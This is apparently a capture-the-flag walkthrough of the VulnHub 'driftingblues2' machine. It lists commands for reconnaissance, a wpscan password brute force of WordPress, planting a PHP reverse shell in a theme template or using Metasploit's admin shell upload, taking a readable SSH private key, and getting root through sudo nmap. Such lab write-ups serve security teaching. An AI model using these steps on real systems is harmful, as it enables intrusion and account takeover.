We will be doing driftingblues2 challenge from vulnhub in this post. Please check this link for the walkthrough of driftingblues 1.
fping -aqg 10.0.2.0/24
ports=$(nmap -p- --min-rate=1000 -T4 10.0.2.6 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && nmap -p$ports -sC -sV 10.0.2.6
We found out that, anonymous ftp is present. Let’s get that file first and see what the image is about.
ftp 10.0.2.6 # use anonymous as username and leave password blank
get secret.jpg exit
The file is stored in the current directory. The following is the image.
gobuster dir -u 10.0.2.6 --wordlist /usr/share/wordlists/dirb/common.txt
When we visit the link we see, it’s a wordpress blog.
On hovering a link in the blog, we saw that the hostname for the ip is driftingblues.box. So, we will be changing that in our /etc/hosts file.
sudo vi /etc/hosts
When we go through the blog, we don’t find any revealing secrets. This only leaves us with the option to brute force login. For this, we are going to use wpscan tool and rockyou.txt wordlist.
wpscan --url http://driftingblues.box/blog --detection-mode aggressive -e --passwords=/home/kali/rockyou.txt
We found out the username and password of the wordpress user. Now, we have two ways to get a reverse shell. One is using metasploit framework whereas another is manually adding the php shell to the theme’s php files. I will show you both of the methods.
Method 1: Injecting php manually
We can login in wordpress.
We can place the reverse shell in 404 template which is a perfect choice for me. You tell me, how often do you land at 404 page while using a website? Now, we will copy the PHP reverse shellcode, update the ip and port and paste it here.
You can find shellcodes in kali linux and parrot os distro or anywhere on the internet. If you can, you can generate one using msfvenom or msfconsole.
Now, it’s time to invoke the 404 page. Before that, we have to listen on the specified port 4444 For that, let’s edit an url of a valid post.
nc -nlvp 4444
We got the shell.
Method 2: Using metasploit module
There is a module for wordpress in metasploit framework which can upload a shell after authenticating.
use exploit/ use exploit/unix/webapp/wp_admin_shell_upload set username albert set password s<snip>1 set rhosts 10.0.2.6 set targeturi /blog run
We got a meterpreter shell. However, we could have set a linux shell in the payload. That’s up to us. We can go to linux shell using
shell -t command in meterpreter.
ls -al /home cd /home/freddie ls -al .ssh
As we can see above, there is a private key with ‘read’ permission to other users. Now, we can open that and copy the content. After that, we can paste the content into a file in our local machine and change the permission. I am naming the file as id_rsa.
On local machine.
vi id_rsa # paste the content chmod 400 id_rsa # readonly permission to the owner ssh firstname.lastname@example.org -i id_rsa
We got the access to freddie. Let’s open the flag.
Now, we have to identify the way to get root access using nmap. Doing some research, I found out that nmap in fact has a way to run shell commands in two different sets of version.
nmap --version # gives 7.70
Therefore, we have to use the way of nmap 7.70 to get root shell.
TF=$(mktemp) echo 'os.execute("/bin/bash -i")' > $TF sudo nmap --script=$TF
We got the root shell. However, we cannot see what we type. For that type
reset and enter. Now, it’s time to get the flag.
reset cd /root ls -al cat root.txt
This box is quite easy. For me only thing that took some time was getting the foothold because generally I don’t go into bruteforcing.